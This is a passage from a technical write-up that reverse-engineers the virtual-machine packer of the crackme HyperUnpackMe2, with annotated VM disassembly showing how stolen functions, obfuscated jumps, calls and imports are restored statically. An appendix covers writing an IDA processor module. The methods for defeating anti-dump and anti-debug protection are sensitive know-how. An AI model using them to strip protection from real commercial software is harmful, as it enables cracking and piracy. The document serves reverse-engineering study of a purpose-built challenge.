During initialization, the VM calls a function which scans the VM’s data looking for all occurrences of the dword ‘$$$$’. For each instance found, it treats the next dword as the key, and takes the address of the dword following that as the pointer.

    ['$$$$'][4-byte key]^[arbitrary data]  ^:  pointer

3.3.2 Using the Associative Array

In the instruction set, group four specifically, there are two pairs of instructions which add and remove memory blocks from the internal associative array. The first pair allocates memory with VirtualAlloc, and the second pair uses HeapAlloc. There is no protection in the VM against attempting to de-allocate a block which wasn’t allocated in the first place.

Group five contains an instruction, getmem, to fetch a memory block given a key. Group three, the control-flow transfer instructions, can take memory keys as arguments. In other words, jmp/jcc key will transfer control into the memory region pointed at by the key. In fact, the first instruction executed by the VM is of the form jmp key, and this is the primary form of control-flow transfer in the VM.

 4.0 Static Analysis of HyperUnpackMe2’s VM Code

Based on the analysis of the VM dispatching harness, I constructed an IDA processor module to examine the code inside of the VM — dead and natively. As such, the anti-debugging tricks are generally beyond the scope of this article, but a brief discussion can be found in appendix A. See appendix B for information about writing IDA processor modules.

Beyond the anti-debugging, there’s a lot of anti-dump protection in this packer. The main «tricks» all involve the redirection of certain aspects of normal code execution.

  • The stolen functions are copied into VirtualAlloc’ed memory.
  • The API calls and API-referencing instructions point to obfuscated stubs which eventually redirect to their intended targets, which are actually in copies of the referenced DLLs, not the originals. There are 73 kilobytes’ worth of obfuscated stubs in the packer section.
  • Relative jumps and calls travel through tiny stub functions in VirtualAlloc’ed memory onto their destinations.

Further, all API references are changed to relatively-addressed varieties instead of direct references, i.e. 0xE8 [displacement to import] (call import_address) instead of 0xFF 0x15 [IAT entry] (call dword ptr [IAT entry]).

The point is to make dumping as hard as possible by creating a rigid reliance on the exact layout of the process’ address space as it exists during that particular invocation (including the VirtualAlloc’ed memory regions and copied DLLs), and by removing any trace of the import table.

The following sections fill in the gaps (no pun intended) left in section 1.2 by describing precisely what happens under the covers of the VM. In the course of examination, we find that the fixups for each type take place in clusters, with similar code being used repeatedly to perform the same type of fixup. This turns out to be all of the information needed to break the protection, resulting in an automatic, static unpacker for any binary packed with it (of which there are no more — TheHyper informed me that the protector was lost due to a disk crash).

 4.1 Stolen Functions

The first thing we’ll need to deal with are the missing functions. As we can see in the following snippet, it turns out that the functions are copied into allocated memory, and a long jump into the relevant function in allocated memory is inserted at the site of the function in the original code section. It should be noted that the stolen functions are still subject to the modifications described in subsequent sections.

    .text:01001B9A    ; __stdcall UpdateStatusBar(x)
    .text:01001B9A    _UpdateStatusBar@4 db 0B7h dup(0)
    
    ROM:0103AFAA    mov     r0B, 1038A82h ; location of function in the VM section
    ROM:0103AFB2    mov     r06, 0B7h     ; notice this matches up with the
    ROM:0103AFBA    push    r06           ; size of the stolen function above
    ROM:0103AFBD    push    r0B
    ROM:0103AFC0    push    r0F           ; points to a block of allocated mem
    ROM:0103AFC3    x86call x86_memcpy
    ROM:0103AFC9    add     rESP, 0Ch
    ROM:0103AFD1    mov     r0B, 1001B9Ah ; address of UpdateStatusBar
    ROM:0103AFD9    mov     r0E, r0F
    ROM:0103AFDD    sub     r0E, r0B
    ROM:0103AFE1    sub     r0E, 5        ; r0E is the displacement of the jmp
    ROM:0103AFE9    add     r0F, r06      ; point after the copied function
    ROM:0103AFED    mov     [r0Bb], 0E9h  ; assemble a long jmp
    ROM:0103AFF2    inc     r0B
    ROM:0103AFF5    mov     [r0B], r0E    ; write the displacement for the jmp

Locating these copies is easy enough: references to x86_memcpy following the final memory key are the ones which copy the stolen functions into VirtualAlloc’ed memory. We can easily extract the source of the copy and the destination of the write and copy the function back into its original real estate within the binary.

While we’re on the subject, when fixups are made to functions which have been copied into allocated memory, they are made as a displacement against the beginning of that memory. I.e. we might see a fixup of a long jump made against address [displacement + 100h]. Thus, in order to know where in the original binary this long jump is, we need to retain information about where the functions in the original binary are situated in the allocated memory.

For example:

    Displacement   0h into allocated memory -> 1001B9Ah
    Displacement  B7h into allocated memory -> 1001EEFh
    Displacement 11Dh into allocated memory -> 100696Ah

Then, when we see one of these arbitrary displacements, we can map it to a location in the original binary by looking for the greatest lower bound in the set of displacements. I.e. for displacement C0h, this is +9h into the function with displacement B7h, and is therefore at the address 1001EEFh + 9h. Here’s an example:

    ROM:01049920    getmem  r0B, 10000h
    ROM:01049926    mov     r0B, [r0B]
    ROM:0104992A    add     r0B, 639h    ; where does this point?

 

 4.2 Long Jump Obfuscation

 

    .text:010019DF E9 00 00 00 00                    jmp     $+5

Here we see, in the x86 IDB, an example of the jmp obfuscation. What actually happens here, at runtime, is that a chunk of memory is allocated, and gets filled with what looks like API thunk functions. The jmps in the binary are patched to jmp into the allocated memory, which subsequently jmps to the correct location in the binary. The following VM code illustrates this:

    ROM:0104840F    valloc  195h, 6       ; allocate 0x195 bytes of vmem under the
    ROM:01048418    getmem  r0E, 6        ; tag 0x6
                    
    ROM:0104841E    mov     r0F, 10019DFh ; see above:  same address
    ROM:01048426    mov     r0D, r0F
    ROM:0104842A    add     r0D, 5        ; point after the jump
    ROM:01048432    mov     r09, r0E      ; point at the currently-assembling stub
    ROM:01048436    sub     r09, r0D      ; calculate the displacement for the jmp
    ROM:0104843A    inc     r0F           ; point to the 0 dword in e9 00000000
    ROM:0104843D    mov     [r0F], r09    ; insert reference to allocated memory
    ROM:01048441    mov     r0B, 1001AE1h ; this is the target of the jmp
    ROM:01048449    mov     r0C, r0E
    ROM:0104844D    add     r0C, 5        ; calculate address after allocated jmp
    ROM:01048455    sub     r0B, r0C      ; calculate displacement for jmp
    ROM:01048459    mov     [r0Eb], 0E9h  ; build jmp in VirtualAlloc'ed memory
    ROM:0104845E    inc     r0E
    ROM:01048461    mov     [r0E], r0B    ; insert address into jmp
    ROM:01048465    add     r0E, 4

This is the general code sequence used to fix up the jumps when the function to be fixed up remains in the original binary’s sections. When the function has been copied into memory, as described in the previous section, the code changes slightly: r0F and r0B’s addresses are the displacements described previously. For example, the code at -41E and -441 are replaced with these snippets, respectively:

    ROM:010498F3    getmem  r0F, 10000h
    ROM:010498F9    mov     r0F, [r0F]
    ROM:010498FD    add     r0F, 469h
    
    ROM:01049920    getmem  r0B, 10000h
    ROM:01049926    mov     r0B, [r0B]
    ROM:0104992A    add     r0B, 639h

Given the sequences above, and making use of the stolen address -> real address mapping, it’s trivial to cut out the middleman and insert the proper displacements into the correct dword locations. In the code above, we retrieve the dword operands from -41E and -441 and simply fix the jumps ourselves.

 4.3 Calls-To Obfuscation

These are handled in a very similar fashion as the jump obfuscation: the code to fix up the calls-to references is exactly the same as the jump obfuscation fixups. The calls also go through stubs in allocated memory which jmp to their proper destinations.

    .text:01001C51 6A 00             push    0
    .text:01001C53 E8 00 00 00 00    call    $+5
    .text:01001C58 C2 1C 00          retn    1Ch
    
    ROM:0104419A    valloc  3F2h, 5       ; allocate 0x3f2 bytes of memory under
    ROM:010441A3    getmem  r0E, 5        ; the tag 0x5
    
    ROM:010441A9    mov     r0F, 1001C53h ; address of call to be fixed up (above)
    ROM:010441B1    mov     r0D, r0F
    ROM:010441B5    add     r0D, 5        ; point after the call
    ROM:010441BD    mov     r09, r0E      ; r09 points to the allocated jmp stub
    ROM:010441C1    sub     r09, r0D
    ROM:010441C5    inc     r0F
    ROM:010441C8    mov     [r0F], r09    ; insert the proper displacement
    ROM:010441CC    mov     r0B, 1001B9Ah ; we would be calling this address
    ROM:010441D4    mov     r0C, r0E
    ROM:010441D8    add     r0C, 5
    ROM:010441E0    sub     r0B, r0C      ; calculate displacement
    ROM:010441E4    mov     [r0Eb], 0E9h  ; form the long jmp in allocated memory
    ROM:010441E9    inc     r0E
    ROM:010441EC    mov     [r0E], r0B
    ROM:010441F0    add     r0E, 4

Notice that, in this case, a call from a non-stolen function is being fixed up to call a non-stolen function: the addresses on lines -1A9 and -1CC are hard-coded within the binary. When a call in a stolen function is fixed up to call another function, the beginning of the above code sequence is different: it uses the getmem idiom, as we saw previously. The code at -1A9 becomes:

    ROM:010441F8    getmem  r0F, 10000h
    ROM:010441FE    mov     r0F, [r0F]
    ROM:01044202    add     r0F, 20Dh

However, the destination address is not loaded via getmem, because as we saw previously, calls to stolen functions are routed to their destinations via these jumps. I.e. calls to stolen functions behave just like calls to the original functions.

Recovering the proper displacement from the caller to the callee is as simple as it was for the jumps, because the code is identical, so see the closing remarks for the last section on how to fix up these calls.

 4.4 Import Obfuscation

Here’s a sample of the import redirection. Instead of referencing the imports directly, the jmp/call-to-import instructions are patched to reference locations such as these:

    TheHyper:01021524    pushf
    TheHyper:01021525    pusha
    TheHyper:01021526    call    sub_1021548
    
    TheHyper:01021548    pop     eax
    TheHyper:01021549    add     eax, 16h
    TheHyper:0102154C    jmp     eax

This sort of thing goes on for a while (six layers for this one) with some random junked garbage interspersed before eventually redirecting control to the original import:

    TheHyper:010215DE 61                popa
    TheHyper:010215DF 9D                popf
    TheHyper:010215E0 E9 00 00 00 00    jmp     $+5

4.4.1 IAT Reconstruction

Believe it or not, the first thing that HyperUnpackMe2 does when it really gets down to business is to correctly rebuild the original IAT.

First, the DLL names are retrieved from memory byte-by-byte. The names are not stored contiguously, but rather, the bytes corresponding to the DLL names are randomly mixed together. The DLL is then LoadLibraryA’d.

    ROM:01026058    mov     r04, 1013000h  ; point to beginning of packer section
    ROM:0102607B    getmem  r05, dword_101382D
    ROM:01026081    mov     r0B, r09
    ROM:01026085    mov     r06, r04
    ROM:01026089    add     r06, 41Ch
    ROM:01026091    mov     [r0Bb], [r06b] ; copy byte of DLL name from 0x101341c
    ROM:01026095    inc     r0B
    ROM:01026098    mov     r06, r04
    ROM:0102609C    add     r06, 93h
    ROM:010260A4    mov     [r0Bb], [r06b] ; copy byte of DLL name from 0x1013093
    
    ; idiom repeats a variable number of times
    
    ROM:010260A8    inc     r0B
    ROM:0102617C    mov     [r0Bb], 0
    ROM:01026181    push    r09
    ROM:01026184    x86call r0C                 ; LoadLibraryA
    ROM:01026186    add     rESP, 4

Next, the entire DLL’s address space is copied into a freshly-allocated chunk of memory. Yes, you read that right. The DLL’s SizeOfImage is used as the size parameter to VirtualAlloc, and then the entire DLL is memcpy’d into it the result. This is responsible for a huge bloat in the memory footprint. I didn’t think that this trick would work, but the crackme does run, after all. Personal correspondence with TheHyper reveals that this is why the crackme only runs on XP SP2 (although I haven’t investigated why — help me out here, Alex?).

The following code illustrates the process:

    ROM:0102618E    push    r09
    ROM:01026191    push    r0B
    ROM:01026194    push    r0D
    ROM:01026197    mov     r09, r0A
    ROM:0102619B    getmem  r0A, g_Copy_Of_Kernel32_Address_Space
    ROM:010261A1    mov     r0A, [r0A]
    ROM:010261A5    push    kernel32_hashes_VirtualAlloc
    ROM:010261AB    push    r0A
    ROM:010261AE    vmcall  API__GetProcAddress
    ROM:010261B4    mov     r0D, r0A
    ROM:010261B8    mov     r0B, r09
    ROM:010261BC    add     r0B, 3Ch
    ROM:010261C4    mov     r0B, [r0B]
    ROM:010261C8    add     r0B, r09
    ROM:010261CC    add     r0B, 50h
    ROM:010261D4    mov     r0B, [r0B]          ; retrieve this DLL's SizeOfImage
    ROM:010261D8    push    40h
    ROM:010261DE    push    1000h
    ROM:010261E4    push    r0B
    ROM:010261E7    push    0
    ROM:010261ED    x86call r0D                 ; allocate that much memory
    ROM:010261EF    add     rESP, 10h
    ROM:010261F7    mov     r03, r0A
    ROM:010261FB    mov     [r05], r0A
    ROM:010261FF    push    r0B
    ROM:01026202    push    r09
    ROM:01026205    push    r0A
    ROM:01026208    x86call x86_memcpy          ; copy DLL's address space
    ROM:0102620E    add     rESP, 0Ch
    ROM:01026216    pop     r0D
    ROM:01026219    pop     r0B
    ROM:0102621C    pop     r09

Next, the imported APIs are loaded, but not in the normal way. The protector includes a VM-function that I’ve called API__GetProcAddress, which takes a pseudo-HMODULE and a shellcode-like API hash as arguments. The pseudo-HMODULE is the address of the memory that the DLL was copied into above. Thus, the addresses returned by this function reside in the copied DLL bodies, and not the originals.

API__GetProcAddress works by iterating through the DLL’s exports and hashing each function’s name, stopping when it finds the corresponding hash that was passed in as an argument. It then returns the address of that function.

This makes it harder for dynamic tools to identify which APIs are actually being used: after all, the API addresses are not contained within a loaded module.

The hashes and their locations in the original IAT are retrieved from the jumble of data at the beginning of the packer section in a similar fashion as the assembling of the DLL names. Additionally, the address at which the resolved import belongs in the original IAT entries is also assembled from scattered data.

    ROM:0102621F    xor     r07, r07    ; r07 = hash
    ROM:01026223    mov     r06, r04
    ROM:01026227    add     r06, 12h
    ROM:0102622F    mov     r05, [r06]
    ROM:01026233    and     r05, 0FFh
    ROM:0102623B    or      r07, r05    ; get a single byte of the hash
    ROM:0102623F    ror     r07, 8
    
    ; idiom repeats three times
    
    ROM:010262B3    xor     r08, r08    ; r08 = where to put the resolved import
    ROM:010262B7    mov     r06, r04
    ROM:010262BB    add     r06, 5C7h
    ROM:010262C3    mov     r05, [r06]
    ROM:010262C7    and     r05, 0FFh
    ROM:010262CF    or      r08, r05
    ROM:010262D3    ror     r08, 8
    
    ; idiom repeats three times
    
    ROM:01026347    push    r07
    ROM:0102634A    push    r03         ; point at copied DLL
    ROM:0102634D    vmcall  API__GetProcAddress
    ROM:01026353    add     r08, 1000000h
    ROM:0102635B    mov     [r08], r0A  ; store resolved address back into IAT

The DLL names, hashes, and IAT addresses can all be recovered with no difficulties, and we can ignore the DLLs being copied into dynamically allocated memory. It’s a simple matter to reverse the hashes into API names. Therefore, the entirety of the import information can be reconstructed statically: we can simply mimic what the packer itself does, rebuild the IDTs/IATs with no difficulties, and then point the imports directory pointer in the PE header to our rebuilt structures.

I was anticipating things would be harder than they turned out to be, so I decided to move the FirstThunk lists (into which the original import references were made) instead of keeping them at their original addresses. This turned out to be an unnecessary mistake that complicates some of what follows. I apologize.

In order to rectify this situation, I kept a map from the old IAT addresses into the new IATs that I created.

For example:

    .text:010012A0    __imp__PageSetupDlgW@4 dd 0

    010012A0 -> [Address of new FirstThunk entry for PageSetupDlgW import]

4.4.2 IAT Redirection

The next thing that happens is that the addresses which were resolved in the previous section are inserted into API-obfuscating stubs described in 4.4, and the addresses of these API-obfuscating stub functions are inserted into the IAT atop the import addresses.

    .text:010012A0    ; BOOL __stdcall PageSetupDlgW(LPPAGESETUPDLGW)
    .text:010012A0    __imp__PageSetupDlgW@4 dd 0
    
    TheHyper:01014126    pushf              
    TheHyper:01014127    pusha              
    TheHyper:01014128    call    sub_1014150 ; eventually ends up at next snippet
                                                                           
    TheHyper:0101423A    popa                       
    TheHyper:0101423B    popf                       
    TheHyper:0101423C    jmp     near ptr 0B97002DDh ; patch here + 1 byte
    
    ROM:0103659A    mov     r0B, 10012A0h ; see above:  IAT addr
    ROM:010365A2    mov     r0E, 1014126h ; see above:  beginning of import obfs
    ROM:010365AA    mov     r08, 101423Dh ; see above:  end of import obfs
    ROM:010365B2    mov     r06, [r0B]
    ROM:010365B6    mov     [r0B], r0E    ; replace IAT addr with obfuscated addr
    ROM:010365BA    mov     r03, r08
    ROM:010365BE    dec     r03
    ROM:010365C1    add     r03, 5
    ROM:010365C9    sub     r06, r03
    ROM:010365CD    mov     [r08], r06    ; form relative jump to real import

This makes no difference to the static examiner, and does not require fixups.

4.4.3 Call Instruction Fixup

Next, the CALL instructions which reference the IAT are re-created as relatively-addressed instructions which reference the API-obfuscating stub functions. The instructions in the original binary were 0xFF 0x15 [direct address], the pre-fixup instructions are 0xCC 0x90 0x90 0x90 0x90 0x90, and the new instructions are 0xE8 [relative address] 0x90. As this operation requires one less byte than the original directly-addressed references, a NOP is needed for the remaining byte cavity.

    .text:010019D4    int     3    ; Trap to Debugger
    .text:010019D5    nop
    .text:010019D6    nop
    .text:010019D7    nop
    .text:010019D8    nop
    .text:010019D9    nop
    
    ROM:0103C747    mov     r03, 10019D4h ; address of the snippet above
    ROM:0103C74F    mov     r06, r03
    ROM:0103C753    add     r06, 5        ; point after call
    ROM:0103C75B    mov     [r03b], 0E8h  ; insert relative call
    ROM:0103C760    inc     r03
    ROM:0103C763    mov     r04, 100121Ch ; where we call to
    ROM:0103C76B    sub     r04, r06      ; create relative displacement
    ROM:0103C76F    mov     [r03], r04    ; insert relative address
    ROM:0103C773    add     r03, 4
    ROM:0103C77B    mov     [r03b], 90h   ; insert NOP in empty byte spot

As before, the idiom is slightly different for fixing the calls in stolen functions, in that r03 is fetched from memory instead of referenced directly. The code at -747 would become, for instance:

    ROM:0103C67E    getmem  r03, 10000h
    ROM:0103C684    mov     r03, [r03]
    ROM:0103C688    add     r03, 1318h

In order to fix these up, we retrieve the address of the call from -747, and the import destination from -763. We then manually insert the correct instruction which calls into this IAT slot. Actually, due to my previously-described mistake, we first run the IAT address through the old IAT slot -> new IAT slot map before fixing the instruction.

4.4.4 Mov Instruction Fixup

Next, instructions of the form mov reg32, [dword from IAT] are fixed up by the protector in the same fashion as in the previous section. They are relatively addressed to point directly to the obfuscated stubs (whose addresses are fetched out of the IAT), instead of the direct addressing that was present in the original binary. The registers involved in this process are ESI, EDI, EBP, EBX, and EAX.

Stop and think for a second. So far, we’ve made the assumption that all imports are functions, but this is not always true. The MSVC CRT contains references to two imported data items. Trying to run a data import through the import-obfuscating procedure is an incorrect transformation and will always result in a crash. This is an Achilles’ heel of this protection.

The mov-instruction fixup is accomplished in much the same way as the call-instruction fixups. There are several idioms: for stolen functions, for regular functions, for EAX versus the other registers (as the instruction for EAX is five bytes, while the others are six bytes). The EAX-references are assumed to point to data and are fixed up directly instead of relatively.

Once again, extracting this information from the code sequences is not difficult to do statically, and I think I’m starting to develop RSI so I’ll skip the details here.

4.4.5 IAT Zeroing

After all of the references are correctly fixed up, the import addresses in the IAT are no longer needed, and are zeroed. We can ignore this step.

 4.5 The Rest of the Protection

As is usual in unpacking tasks, we must set the original entrypoint field of the PE header to the real entrypoint. We scan the disassembly listing for the instruction ‘stop’ and then statically backtrace to find the value of r0A.

    ROM:01049F05    mov     r0A, 1006AE0h
    ROM:01049F0D    stop

Finally, the NumberOfRVAsAndSizes field of the PE header has been set to -1 in order to confuse OllyDbg, so we should set that back to 0x10, the default. And while we’re at it, reduce the raw and virtual sizes of the last section, reduce the SizeOfImage, and truncate the last section in the executable. The final executable is exactly 1kb larger than the copy of notepad.exe which ships with Windows XP SP2.

After making all of the above modifications, the binary runs properly. Success!

 5.0 Comments On The Protection

It took a lot of work to unpack this protector, but ultimately, the static solution was both obvious and straightforward. On the other hand, dynamic dumping of this protector would be difficult, although still feasible.

 5.1 Problems With The Protection

This protection has a few problems in the theoretical sense. For one, it requires disassembling the binary: considering that the IAT is zeroed, _every_ reference to the IAT must be accounted for; if not, the program will simply crash. For example, if a trivial packer which XORed the code section, but left the imports alone, was applied first, all references would be missed and the binary would have no hope of running. This could be assuaged by not zeroing the original IAT (but still applying fixups on those which can be found) so that any non-found references continue to work properly.

Another problem is, of course, that disassembly isn’t perfect, and you could end up with all sorts of bugs if you just blindly replace what you think is a reference to the IAT if it is instead just plain old data, for instance.

Another problem is functions which have merged tails. If a function with a shared exit path is stolen, there are going to be problems.

Another problem, discussed in a previous section, is the assumption that imports will always point to functions and not data. This a faulty assumption, and will cause many failures.

All of that being said, if one assumes perfect disassembly (which is possible manually via IDA and/or full debugging information) and allows a blacklist of imports which are data, then this is a working protection, one which I expect will be quite potent after a few generations. By no means is this a «fire and forget» packer like UPX, but it can be made to work on a case-by-case basis.

 Appendix A: Anti-Debugging Tricks

There are 53 anti-debug mechanisms and checks in the VM, 49 of which can be broken automatically with either a tiny IDC script patching the bytecode directly, or a small patch to the VM harness. Of the remaining four, there are two which I’ve never heard of before (although I don’t do this type of work often), so it’s worth checking it out in the IDB, but I won’t ruin the surprises here. I didn’t look too heavily into those which could be broken automatically, so some of those descriptions in the IDB may be incorrect.

You may notice conditional jump instructions in the IDB which don’t have their jump targets resolved, such as the following:

    ROM:01035E90    cmp     r07, 1
    ROM:01035E98    jz      77026DDFh

At first I figured my processor module was buggy, and that this instruction was supposed to transfer control to a keyed memory region which the processor module had failed to locate. After inspection of the raw bytecode and a close look at the relevant VM harness code, in fact, this instruction will move the VM EIP to the immediate value 0x77026DDF, which will cause a reading access violation or undefined behavior during the next VM cycle, depending upon whether that’s a valid address. Hence, jumps with unresolved targets are anti-debugging tricks. TheHyper confirmed this afterwards in private correspondence.

 Appendix B: IDA Processor Module Construction

The main difference between writing a simple disassembler and writing an IDA processor module is that, instead of printing the disassembly immediately and moving on to the next instruction, information about each individual instruction and operand must be retained for later analysis and display.

For example, according to this VM’s instruction encoding, 0x20 0x?[0-0xf] means «get flags into specified register». Whereas in a trivial disassembler one might write this:

    case 0x20:
        printf("%lx:  getefl %s\n", address, decode_register(next_byte & 0xf));
        return 2; // size of instruction

In an IDA processor module, one must write something like this (in ana.cpp):

    case 0x20:
        cmd.itype    = TH_getefl; // instruction code is TH_getefl; this comes
                                  // from an enumeration
        cmd.Op1.type = o_reg;     // operand 1 is register
        cmd.Op1.reg  = TH_Regnum(4, ua_next_byte() & 0xf); // get register num
        cmd.Op1.dtyp = dt_dword;  // register is dword size
        cmd.Op2.type = o_void;    // operands 2+ do not exist
        length = 2;               // instruction size is 2
        break;

TH_getefl is an element of an enum (ins.hpp), which in turn has a text representation and flags (ins.cpp). The operand information is eventually retrieved and printed (out.cpp):

    case o_reg:
        OutReg( x.reg );
        break;

Clearly, writing an IDA processor module is a significant amount of work compared to writing a simple disassembler, and in the case of small portions of straight-line VM code, the latter approach (via IDC) is preferable. However, in the case of large amounts of VM code with non-trivial control flow structure, the traditional advantages of IDA (cross-reference tracking, comment-ability, ability to name locations, creation and application of structures, and the ability to run scripts and existing plugins) really begin to shine.

 B.1 Logical and Physical Divisions of an IDA Processor Module

It should be noted that, as with all C++ source code, physical divisions are irrelevant as long as all references can be resolved at link-time; however, the layout presented herein is consistent with the processor modules released in the IDA SDK, and also with the included processor module. Coincidentally, this information is laid out in the same order as specified by Ilfak in %idasdk%\readme.txt:

    "  Usually I write a new processor module in the following way:
            - copy the sample module files to a new directory
            - first I edit INS.CPP and INS.HPP files
            - write the analyser ana.cpp
            - then outputter
            - and emulator (you can start with an almost empty emulator)
            - and describe the processor & assembler, write the notify() function"

It should also be noted that I have written only one processor module and am not an expert on the subject. This information presented is correct as far as I am aware, but should not be considered authoritative. When in doubt, consult the processor module sources in the IDA SDK, inquire on the DataRescue forums, ask Ilfak, and buy the SDK support plan as a last resort.

 B.2 Assigning Each Mnemonic a Numeric Code and Textual Representation

The files herein are solely responsible for defining the opcodes used by the processor, their mnemonics specifically, in both numeric and textual forms.

B.2.1 Ins.hpp

This file contains an enum, called «nameNum» by Ilfak, which assigns each opcode to a number. This enum contains a special, unused leading entry ([processor]_null, set to zero), and a trailing entry ([processor]_last) denoting the beginning and the end of the enum.

    enum nameNum 
    {
      TH_null = 0,    // Unknown Operation
      TH_mov,         // Move                
      [...,]          // [more instructions here]
      TH_stop,        // Stop execution, return to x86
      TH_end          // No more instructions
    };

B.2.2 Ins.cpp

This file is the counterpart to the corresponding header file, which contains an array of instruc_t structures, which consist of a const char * (the mnemonic’s textual description) and a flags dword. The entries in this array correspond numerically to the values given in the enum. The flags specify the number of operands the instruction uses/changes, whether the instruction is a call/switch jump, and whether to continue disassembling after this instruction is encountered (e.g. return instructions and unconditional jumps do not generally transmit control flow to the following instruction).

    instruc_t Instructions[] = {
      { "",                     0             },  // Unknown Operation
      
      // GROUP 1:  Two-Operand Arithmetic Instructions
      { "mov" ,   CF_USE2 | CF_USE1 | CF_CHG1 },  // Move
      [{...,...},]                                // [more instructions]
      { "stop"   ,                    CF_STOP }   // Stop execution, return to x86
    
    };

 

 B.3 Assigning Each Register a Numeric Code and Textual Representation

B.3.1 Reg.hpp

This file contains an enum, whose real entries begin at 0 (unlike previously- described enums with a bogus leading entry), consisting of the legal registers supported by the processor. As IDA takes into account the concept of segmentation, you will need to define fake code and data segment registers if your processor does not use them.

    enum TH_regs
    {
        rESPb = 0,
        rESPw,
        rESP,
        [...,]
        r0F,
        rVcs, // fake registers for segmentation
        rVds, // fake
        rEND
    };

B.3.2 [Processor].hpp This file contains an array of const char *s which map the elements of the enum described in the previous subsection to a textual representation thereof.

    static char *TH_regnames[] =
    {
        "rESPb",
        "rESPw",
        "rESP",
        [...,]
        "r0F"
    };

 

 B.4 Analyzing an Instruction And Filling IDA’s «cmd» Structure

The main disassembler function in an IDA processor module is called int ana() and lives in ana.cpp. This function takes no parameters, and instead retrieves the relevant bytes to decode via the functions ua_next_byte(), _word(), and _long().

This function, or collection of functions as the case may be, is responsible for:

  • Setting cmd.itype to the correct value from the nameNum enum described in section B.2.1.
  • Setting the fields of cmd.Op[1-6] to describe the types of operands (registers, immediates, addresses, etc.) used by this instruction.
  • Returning the length of the instruction.

An example from the included processor module:

    case 0x1d:
        cmd.itype     = TH_vfree;       // virtualalloc'ed memory free 
        cmd.Op1.type  = o_imm;          // type of operand 1 is immediate
        cmd.Op1.value = ua_next_long(); // value = memory key to free
        cmd.Op1.dtyp  = dt_dword;       // 4-byte memory key
        length = 5;                     // 5 bytes, 1 for opcode, 4 for operand
        break;

The cmd structure ties together the functions described in the next two sections: these functions do not take arguments, and instead retrieve information from the cmd structure in order to perform their duties.

 B.5 Displaying Operands

Out.cpp is responsible for providing two functions, bool outop( op_t & ) and void out(). out() is responsible for outputting the mnemonic and deciding whether to output the operands.

There’s a bit of subtlety here: processors which use conditional execution, for example ARM and the instruction MOVEH, may have a single nameNum/Instructions entry for an opcode («MOV»), and the logic for prepending «-EH» to the mnemonic exists in out(). I have not encountered this while coding a processor module and cannot speak about it.

One thing to notice about the code below is how gl_comm is set to 1 every time out() is called. If you do not do this, you will not see comments in the disassembly. Figuring this required an email to Ilfak. Frankly, it’s puzzling why displaying comments is not the default behavior, but this is the reality, so be sure to set this variable.

    void out( void )
    {
        char buf[MAXSTR];
        init_output_buffer(buf, sizeof(buf));
        OutMnem();
        
        if( cmd.Op1.type != o_void )
            out_one_operand( 0 );    // output first operand
        
        if( cmd.Op2.type != o_void ) // do we have a second operand?
        {
            out_symbol( ',' );       // put a ", " in the output
            OutChar( ' ' );
            out_one_operand( 1 );    // output second operand
        }
        
        term_output_buffer();
    
        // attach a possible user-defined comment to this instruction
        gl_comm = 1;
                                              
        MakeLine( buf );
    }

The other function, bool outop(op_t &), is responsible for translating the contents of the op_t structure it is given into a textual description of that operand. The structure of this function is a simple switch statement on the op_t.type field. This function should be written concurrently with ana().

The output takes place through a number of functions exported from ua.hpp in the SDK: these functions tend to begin with «Out» or «out_» (out_register, OutValue, out_keyword, out_symbol, etc).

All in all, coding this function is mainly trivial. Here’s one of the more complicated operand types from the included processor module:

    case o_displ:
        out_symbol('[');
        OutReg( x.phrase );
        out_symbol('+');
        OutValue(x, OOF_ADDR );
        out_symbol(']');
        break;

 

 B.6 Creating Cross-References

Most, but not all, instructions implicitly transfer control flow to the next instruction, and create no other cross-references. Some instructions like «ret» and «jmp» do not reference the next instruction. Other instructions, like «call» and conditional jumps, create additional references to the address(es) targeted. Still other instructions create references to data variables specified by immediate values.

This knowledge is not inherent in the depiction of the instruction set which has been developed thus far, and must be specified programatically. This is the responsibility of the int emu() function, which resides in emu.cpp, the smallest .cpp file in the supplied processor module.

    int emu( void )
    {
      ulong Feature = cmd.get_canon_feature();
    
      if((Feature & CF_STOP) == 0) // does this instruction pass flow on?
          ua_add_cref( 0, cmd.ea+cmd.size, fl_F ); // yes -- add a regular flow
    
      if(Feature & CF_USE1) // does this instruction have a first operand?
          TouchArg(cmd.Op1, 0); // process it 
    
      if(Feature & CF_USE2)
          TouchArg(cmd.Op2, 1);
    
      return 1; // return value seems to be unimportant
    }
    
    // "emulation" performed on a given op_t, see emu()
    static void TouchArg( op_t &x, bool bRead )
    {
        switch( x.type )
        {
        case o_vmmem:
            ua_add_cref( 0, get_keyed_address(x.addr), 
                         InstrIsSet(cmd.itype, CF_CALL) ? fl_CN : fl_JN);
            // add a code reference to the targeted address, either a call or a 
            // jump depending on whether that instruc_t's flags has CF_CALL set.
            break;
        }
    }

 

 B.7 Declaring IDA’s Relevant Processor Module Structures

The bulk of what remains is the creation of structures which are directly or indirectly exported by the processor module.

B.7.1 asm_t Structure

This structure defines an «assembler» which determines what the disassembly listing should look like. Specifically, what the syntax is for declaring data, origins, section boundaries, comments, strings, etc.

Since we don’t need to re-assemble virtual machine code (in the case of VMs found in protectors), the choices made here are immaterial, and this structure can be created once and re-used for all VM processor modules.

B.7.2 Function Begin and End Sequences

Both of these are optional. IDA employs both a linear-sweep and a flow-following method of disassembly: on the first pass, it marks all entrypoints as code, and then scans the raw bytes looking for the function begin sequences (such as push ebp / mov ebp, esp). These sequences can be specified in the processor module; however, when dealing with a throwaway VM, they aren’t so important, because you’re unlikely to know a priori what a function prologue looks like.

B.7.3 Processor Notification Event Handler

This is where my ignorance of processor module construction is most transparent. This function is called by the kernel upon certain events being triggered; such events include closing the database, opening an existing IDB, creating a new IDB, changing the processor module type, creating a new segment, and so on. A complete list of events can be found in idp.hpp.

For the creation of this processor module, I did not need to utilize many processor events, so I did not explore this further.

B.7.4 processor_t Structure

This is the «main» structure employed by the processor module, as plugin_t is the main structure employed by a plugin. In this structure, the pieces gathered in the previous sections are stitched together.

The processor module must know:

  • The numeric ID of the processor module (custom-defined).
  • The long and short name of the processor module. I.e. metapc and pc respectively. There’s an important point here which isn’t documented: the makefile has a line called «DESCRIPTION» which MUST be in the format «[long name]:[short name]». Failure to ensure this means that the processor module will not be shown in the list of valid processor modules. Without knowing this, you’ll be mailing Ilfak for advice, like I did.
  • The assembler(s) available. We’ll only need the one we defined in B.7.1.
  • A function pointer to int ana() (see B.4).
  • A function pointer to int emu() (see B.6).
  • A function pointer to void out() and bool outop(op_t &) (see B.5).
  • A function pointer to int notify(processor_t::idp_notify, …) (see B.7.3).
